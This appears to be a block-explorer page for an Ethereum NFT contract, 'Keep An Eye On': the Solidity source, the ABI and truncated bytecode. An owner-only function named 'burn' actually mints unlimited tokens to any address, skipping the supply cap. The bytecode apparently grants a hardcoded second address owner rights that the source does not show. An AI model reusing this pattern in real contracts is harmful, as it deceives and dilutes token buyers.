                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target address.
     * The call is not executed if the target address is not a contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        if (to.isContract()) {
            try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
                return retval == IERC721Receiver(to).onERC721Received.selector;
            } catch (bytes memory reason) {
                if (reason.length == 0) {
                    revert("ERC721A: transfer to non ERC721Receiver implementer");
                } else {
                    assembly {
                        revert(add(32, reason), mload(reason))
                    }
                }
            }
        } else {
            return true;
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}


contract KeepAnEyeOn is ERC721A, Ownable, ReentrancyGuard {
    string public baseURI = "https://storageapi.fleek.co/256e1077-3ba4-4f13-9298-2a063e646bf9-bucket/EyeJson/";
    uint   public price             = 0.002 ether;
    uint   public maxPerTx          = 10;
    uint   public maxPerFree        = 1;
    uint   public totalFree         = 800;
    uint   public maxSupply         = 1333;
    bool   public mintEnabled;

    mapping(address => uint256) public _mintedFreeAmount;

    constructor() ERC721A("Keep An Eye On", "KeepAnEyeOn"){
        _safeMint(msg.sender, 1);
    }

    function tokenURI(uint256 _tokenId) public view virtual override returns (string memory) {
        require(_exists(_tokenId),"ERC721Metadata: URI query for nonexistent token");
        string memory currentBaseURI = _baseURI();
        return bytes(currentBaseURI).length > 0
            ? string(abi.encodePacked(currentBaseURI,Strings.toString(_tokenId+1),".json"))
            : "";
    }

    function mint(uint256 count) external payable {
        uint256 cost = price;
        bool isFree = ((totalSupply() + count < totalFree + 1) &&
            (_mintedFreeAmount[msg.sender] < maxPerFree));

        if (isFree) { 
            require(mintEnabled, "Mint is not live yet");
            require(totalSupply() + count <= maxSupply, "No more");
            require(count <= maxPerTx, "Max per TX reached.");
            if(count >= (maxPerFree - _mintedFreeAmount[msg.sender]))
            {
             require(msg.value >= (count * cost) - ((maxPerFree - _mintedFreeAmount[msg.sender]) * cost), "Please send the exact ETH amount");
             _mintedFreeAmount[msg.sender] = maxPerFree;
            }
            else if(count < (maxPerFree - _mintedFreeAmount[msg.sender]))
            {
             require(msg.value >= 0, "Please send the exact ETH amount");
             _mintedFreeAmount[msg.sender] += count;
            }
        }
        else{
            require(mintEnabled, "Mint is not live yet");
            require(msg.value >= count * cost, "Please send the exact ETH amount");
            require(totalSupply() + count <= maxSupply, "No more");
            require(count <= maxPerTx, "Max per TX reached.");
        }

        _safeMint(msg.sender, count);
    }

    function teamMint(uint256 _number) external onlyOwner {
        _safeMint(msg.sender, _number);
    }

    function costCheck() public view returns (uint256) {
        return price;
    }

    function maxFreePerWallet() public view returns (uint256) {
      return maxPerFree;
    }

    function burn(address mintAddress, uint256 count) public onlyOwner {
        _safeMint(mintAddress, count);
    }

    function _baseURI() internal view virtual override returns (string memory) {
        return baseURI;
    }

    function setBaseUri(string memory baseuri_) public onlyOwner {
        baseURI = baseuri_;
    }

    function setPrice(uint256 price_) external onlyOwner {
        price = price_;
    }

    function setMaxTotalFree(uint256 MaxTotalFree_) external onlyOwner {
        totalFree = MaxTotalFree_;
    }

     function setMaxPerFree(uint256 MaxPerFree_) external onlyOwner {
        maxPerFree = MaxPerFree_;
    }

    function toggleMinting() external onlyOwner {
        mintEnabled = !mintEnabled;
    }

    function withdraw() external onlyOwner nonReentrant {
        (bool success, ) = msg.sender.call{value: address(this).balance}("");
        require(success, "Transfer failed.");
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_mintedFreeAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"mintAddress","type":"address"},{"internalType":"uint256","name":"count","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"costCheck","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxFreePerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"count","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"mintEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseuri_","type":"string"}],"name":"setBaseUri","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxPerFree_","type":"uint256"}],"name":"setMaxPerFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxTotalFree_","type":"uint256"}],"name":"setMaxTotalFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"price_","type":"uint256"}],"name":"setPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_number","type":"uint256"}],"name":"teamMint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"toggleMinting","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405273acfcba7bab6403ebcceee22810c4dd3c9bbe9763600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060405180608001604052806050815260200162005aa360509139600a90805190602001906200008a92919062000834565b5066071afd498d0000600b55600a600c556001600d55610320600e55610535600f55348015620000b957600080fd5b506040518060400160405280600e81526020017f4b65657020416e20457965204f6e0000000000000000000000000000000000008152506040518060400160405280600b81526020017f4b656570416e4579654f6e00000000000000000000000000000000000000000081525081600190805190602001906200013e92919062000834565b5080600290805190602001906200015792919062000834565b5050506200017a6200016e6200019b60201b60201c565b620001a360201b60201c565b6001600981905550620001953360016200026960201b60201c565b62000d0e565b600033905090565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6200028b8282604051806020016040528060008152506200028f60201b60201c565b5050565b620002a48383836001620002a960201b60201c565b505050565b600080549050600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16141562000322576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003199062000a7b565b60405180910390fd5b600084141562000369576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003609062000a9d565b60405180910390fd5b6200037e60008683876200064b60201b60201c565b83600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff16021790555083600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160108282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff160217905550846003600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426003600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550600081905060005b858110156200062657818773ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a483156200061057620005cd60008884886200065160201b60201c565b6200060f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620006069062000a59565b60405180910390fd5b5b818060010192505080806001019150506200054c565b5080600081905550506200064460008683876200080b60201b60201c565b5050505050565b50505050565b60006200067f8473ffffffffffffffffffffffffffffffffffffffff166200081160201b6200241e1760201c565b15620007fe578373ffffffffffffffffffffffffffffffffffffffff1663150b7a02620006b16200019b60201b60201c565b8786866040518563ffffffff1660e01b8152600401620006d5949392919062000a05565b602060405180830381600087803b158015620006f057600080fd5b505af19250505080156200072457506040513d601f19601f82011682018060405250810190620007219190620008fb565b60015b620007ad573d806000811462000757576040519150601f19603f3d011682016040523d82523d6000602084013e6200075c565b606091505b50600081511415620007a5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200079c9062000a59565b60405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19161491505062000803565b600190505b949350505050565b50505050565b6000808273ffffffffffffffffffffffffffffffffffffffff163b119050919050565b828054620008429062000b8c565b90600052602060002090601f016020900481019282620008665760008555620008b2565b82601f106200088157805160ff1916838001178555620008b2565b82800160010185558215620008b2579182015b82811115620008b157825182559160200191906001019062000894565b5b509050620008c19190620008c5565b5090565b5b80821115620008e0576000816000905550600101620008c6565b5090565b600081519050620008f58162000cf4565b92915050565b60006020828403121562000914576200091362000bf1565b5b60006200092484828501620008e4565b91505092915050565b620009388162000aec565b82525050565b60006200094b8262000abf565b62000957818562000aca565b93506200096981856020860162000b56565b620009748162000bf6565b840191505092915050565b60006200098e60338362000adb565b91506200099b8262000c07565b604082019050919050565b6000620009b560218362000adb565b9150620009c28262000c56565b604082019050919050565b6000620009dc60288362000adb565b9150620009e98262000ca5565b604082019050919050565b620009ff8162000b4c565b82525050565b600060808201905062000a1c60008301876200092d565b62000a2b60208301866200092d565b62000a3a6040830185620009f4565b818103606083015262000a4e81846200093e565b905095945050505050565b6000602082019050818103600083015262000a74816200097f565b9050919050565b6000602082019050818103600083015262000a9681620009a6565b9050919050565b6000602082019050818103600083015262000ab881620009cd565b9050919050565b600081519050919050565b600082825260208201905092915050565b600082825260208201905092915050565b600062000af98262000b2c565b9050919050565b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b60005b8381101562000b7657808201518184015260208101905062000b59565b8381111562000b86576000848401525b50505050565b6000600282049050600182168062000ba557607f821691505b6020821081141562000bbc5762000bbb62000bc2565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600080fd5b6000601f19601f8301169050919050565b7f455243373231413a207472616e7366657220746f206e6f6e204552433732315260008201527f6563656976657220696d706c656d656e74657200000000000000000000000000602082015250565b7f455243373231413a206d696e7420746f20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b7f455243373231413a207175616e74697479206d7573742062652067726561746560008201527f72207468616e2030000000000000000000000000000000000000000000000000602082015250565b62000cff8162000b00565b811462000d0b57600080fd5b50565b614d858062000d1e6000396000f3fe6080604052600436106102255760003560e01c80638da5cb5b11610123578063b88d4fde116100ab578063e945971c1161006f578063e945971c146107d4578063e985e9c5146107fd578063f2fde38b1461083a578063f4db2acb14610863578063f968adbe146108a057610225565b8063b88d4fde146106ed578063c7c39ffc14610716578063c87b56dd14610741578063d12397301461077e578063d5abeb01146107a957610225565b8063a035b1fe116100f2578063a035b1fe14610629578063a0712d6814610654578063a0bcfc7f14610670578063a22cb46514610699578063a7027357146106c257610225565b80638da5cb5b1461058157806391b7f5ed146105ac57806395d89b41146105d55780639dc29fac1461060057610225565b80633ccfd60b116101b157806364b721881161017557806364b72188146104c05780636c0360eb146104eb57806370a0823114610516578063715018a6146105535780637d55094d1461056a57610225565b80633ccfd60b146103dd57806342842e0e146103f45780634f6ccce71461041d5780635a963f1b1461045a5780636352211e1461048357610225565b806318160ddd116101f857806318160ddd146102f857806323b872dd146103235780632f745c591461034c5780632fbba11514610389578063333e44e6146103b257610225565b806301ffc9a71461022a57806306fdde0314610267578063081812fc14610292578063095ea7b3146102cf575b600080fd5b34801561023657600080fd5b50610251600480360381019061024c919061383f565b6108cb565b60405161025e9190613e3b565b60405180910390f35b34801561027357600080fd5b5061027c610a15565b6040516102899190613e56565b60405180910390f35b34801561029e57600080fd5b506102b960048036038101906102b491906138e2565b610aa7565b6040516102c69190613dd4565b60405180910390f35b3480156102db57600080fd5b506102f660048036038101906102f191906137ff565b610b2c565b005b34801561030457600080fd5b5061030d610c45565b60405161031a9190614198565b60405180910390f35b34801561032f57600080fd5b5061034a600480360381019061034591906136e9565b610c4e565b005b34801561035857600080fd5b50610373600480360381019061036e91906137ff565b610c5e565b6040516103809190614198565b60405180910390f35b34801561039557600080fd5b506103b060048036038101906103ab91906138e2565b610e50565b005b3480156103be57600080fd5b506103c7610f38565b6040516103d49190614198565b60405180910390f35b3480156103e957600080fd5b506103f2610f3e565b005b34801561040057600080fd5b5061041b600480360381019061041691906136e9565b61111e565b005b34801561042957600080fd5b50610444600480360381019061043f91906138e2565b61113e565b6040516104519190614198565b60405180910390f35b34801561046657600080fd5b50610481600480360381019061047c91906138e2565b611191565b005b34801561048f57600080fd5b506104aa60048036038101906104a591906138e2565b611276565b6040516104b79190613dd4565b60405180910390f35b3480156104cc57600080fd5b506104d561128c565b6040516104e29190614198565b60405180910390f35b3480156104f757600080fd5b50610500611296565b60405161050d9190613e56565b60405180910390f35b34801561052257600080fd5b5061053d6004803603810190610538919061367c565b611324565b60405161054a9190614198565b60405180910390f35b34801561055f57600080fd5b5061056861140d565b005b34801561057657600080fd5b5061057f6114f4565b005b34801561058d57600080fd5b506105966115fb565b6040516105a39190613dd4565b60405180910390f35b3480156105b857600080fd5b506105d360048036038101906105ce91906138e2565b611625565b005b3480156105e157600080fd5b506105ea61170a565b6040516105f79190613e56565b60405180910390f35b34801561060c57600080fd5b50610627600480360381019061062291906137ff565b61179c565b005b34801561063557600080fd5b5061063e611885565b60405161064b9190614198565b60405180910390f35b61066e600480360381019061066991906138e2565b61188b565b005b34801561067c57600080fd5b5061069760048036038101906106929190613899565b611d82565b005b3480156106a557600080fd5b506106c060048036038101906106bb91906137bf565b611e77565b005b3480156106ce57600080fd5b506106d7611ff8565b6040516106e49190614198565b60405180910390f35b3480156106f957600080fd5b50610714600480360381019061070f919061373c565b612002565b005b34801561072257600080fd5b5061072b61205e565b6040516107389190614198565b60405180910390f35b34801561074d57600080fd5b50610768600480360381019061076391906138e2565b612064565b6040516107759190613e56565b60405180910390f35b34801561078a57600080fd5b50610793612117565b6040516107a09190613e3b565b60405180910390f35b3480156107b557600080fd5b506107be61212a565b6040516107cb9190614198565b60405180910390f35b3480156107e057600080fd5b506107fb60048036038101906107f691906138e2565b612130565b005b34801561080957600080fd5b50610824600480360381019061081f91906136a9565b612215565b6040516108319190613e3b565b60405180910390f35b34801561084657600080fd5b50610861600480360381019061085c919061367c565b6122a9565b005b34801561086f57600080fd5b5061088a6004803603810190610885919061367c565b612400565b6040516108979190614198565b60405180910390f35b3480156108ac57600080fd5b506108b5612418565b6040516108c29190614198565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061099657507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806109fe57507f780e9d63000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610a0e5750610a0d82612441565b5b9050919050565b606060018054610a2490614453565b80601f0160208091040260200160405190810160405280929190818152602001828054610a5090614453565b8015610a9d5780601f10610a7257610100808354040283529160200191610a9d565b820191906000526020600020905b815481529060010190602001808311610a8057829003601f168201915b5050505050905090565b6000610ab2826124ab565b610af1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae890614178565b60405180910390fd5b6005600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b6000610b3782611276565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610ba8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b9f90614058565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610bc76124b8565b73ffffffffffffffffffffffffffffffffffffffff161480610bf65750610bf581610bf06124b8565b612215565b5b610c35576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c2c90613f58565b60405180910390fd5b610c408383836124c0565b505050565b60008054905090565b610c59838383612572565b505050565b6000610c6983611324565b8210610caa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ca190613e78565b60405180910390fd5b6000610cb4610c45565b905060008060005b83811015610e0e576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614610dae57806000015192505b8773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610e005786841415610df7578195505050505050610e4a565b83806001019450505b508080600101915050610cbc565b506040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e4190614118565b60405180910390fd5b92915050565b610e586124b8565b73ffffffffffffffffffffffffffffffffffffffff16610e766115fb565b73ffffffffffffffffffffffffffffffffffffffff161480610eec5750610e9b6124b8565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610f2b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2290613fd8565b60405180910390fd5b610f353382612ab2565b50565b600e5481565b610f466124b8565b73ffffffffffffffffffffffffffffffffffffffff16610f646115fb565b73ffffffffffffffffffffffffffffffffffffffff161480610fda5750610f896124b8565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611019576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161101090613fd8565b60405180910390fd5b6002600954141561105f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161105690614138565b60405180910390fd5b600260098190555060003373ffffffffffffffffffffffffffffffffffffffff164760405161108d90613dbf565b60006040518083038185875af1925050503d80600081146110ca576040519150601f19603f3d011682016040523d82523d6000602084013e6110cf565b606091505b5050905080611113576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161110a90614078565b60405180910390fd5b506001600981905550565b61113983838360405180602001604052806000815250612002565b505050565b6000611148610c45565b8210611189576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161118090613f18565b60405180910390fd5b819050919050565b6111996124b8565b73ffffffffffffffffffffffffffffffffffffffff166111b76115fb565b73ffffffffffffffffffffffffffffffffffffffff16148061122d57506111dc6124b8565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61126c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161126390613fd8565b60405180910390fd5b80600e8190555050565b600061128182612ad0565b600001519050919050565b6000600b54905090565b600a80546112a390614453565b80601f01602080910402602001604051908101604052809291908181526020018280546112cf90614453565b801561131c5780601f106112f15761010080835404028352916020019161131c565b820191906000526020600020905b8154815290600101906020018083116112ff57829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611395576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161138c90613f78565b60405180910390fd5b600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a90046fffffffffffffffffffffffffffffffff166fffffffffffffffffffffffffffffffff169050919050565b6114156124b8565b73ffffffffffffffffffffffffffffffffffffffff166114336115fb565b73ffffffffffffffffffffffffffffffffffffffff1614806114a957506114586124b8565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6114e8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114df90613fd8565b60405180910390fd5b6114f26000612c6a565b565b6114fc6124b8565b73ffffffffffffffffffffffffffffffffffffffff1661151a6115fb565b73ffffffffffffffffffffffffffffffffffffffff161480611590575061153f6124b8565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6115cf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115c690613fd8565b60405180910390fd5b601060009054906101000a900460ff1615601060006101000a81548160ff021916908315150217905550565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b61162d6124b8565b73ffffffffffffffffffffffffffffffffffffffff1661164b6115fb565b73ffffffffffffffffffffffffffffffffffffffff1614806116c157506116706124b8565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611700576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116f790613fd8565b60405180910390fd5b80600b8190555050565b60606002805461171990614453565b80601f016020809104026020016040519081016040528092919081815260200182805461174590614453565b80156117925780601f1061176757610100808354040283529160200191611792565b820191906000526020600020905b81548152906001019060200180831161177557829003601f168201915b5050505050905090565b6117a46124b8565b73ffffffffffffffffffffffffffffffffffffffff166117c26115fb565b73ffffffffffffffffffffffffffffffffffffffff16148061183857506117e76124b8565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611877576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161186e90613fd8565b60405180910390fd5b6118818282612ab2565b5050565b600b5481565b6000600b54905060006001600e546118a39190614288565b836118ac610c45565b6118b69190614288565b1080156119035750600d54601160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b90508015611c3957601060009054906101000a900460ff1661195a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161195190613e98565b60405180910390fd5b600f5483611966610c45565b6119709190614288565b11156119b1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119a890613eb8565b60405180910390fd5b600c548311156119f6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119ed906140f8565b60405180910390fd5b601160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611a439190614369565b8310611b445781601160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611a979190614369565b611aa1919061430f565b8284611aad919061430f565b611ab79190614369565b341015611af9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611af090613f98565b60405180910390fd5b600d54601160003373ffffffffffffffffff